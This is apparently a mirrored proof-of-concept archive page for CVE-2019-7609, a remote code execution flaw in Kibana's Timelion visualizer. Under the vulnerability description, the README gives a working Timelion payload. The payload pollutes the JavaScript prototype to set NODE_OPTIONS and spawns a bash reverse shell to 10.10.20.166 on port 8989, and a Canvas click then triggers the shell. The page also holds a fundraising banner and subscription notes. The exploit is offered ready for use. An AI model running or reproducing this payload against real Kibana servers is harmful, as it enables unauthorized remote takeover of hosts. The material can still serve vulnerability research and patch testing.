Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-7609 PoC — Elasticsearch Kibana 代码注入漏洞

Source
Associated Vulnerability
Title:Elasticsearch Kibana 代码注入漏洞 (CVE-2019-7609)
Description:Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
Description
kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609
Readme
# CVE-2019-7609 kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

![](./kibana_RCE.gif)


## 0x01 Timelion Run
```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
![](./version.jpg)
![](Timelion.jpg)

## 0x02 Click Canvas to getshell

![](./Canvas.jpg)

File Snapshot

[4.0K] /data/pocs/6a9c8666de2e1f7504543cd90743784322839303 ├── [425K] Canvas.jpg ├── [220K] kibana_RCE.gif ├── [ 446] README.md ├── [303K] Timelion.jpg └── [128K] version.jpg 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →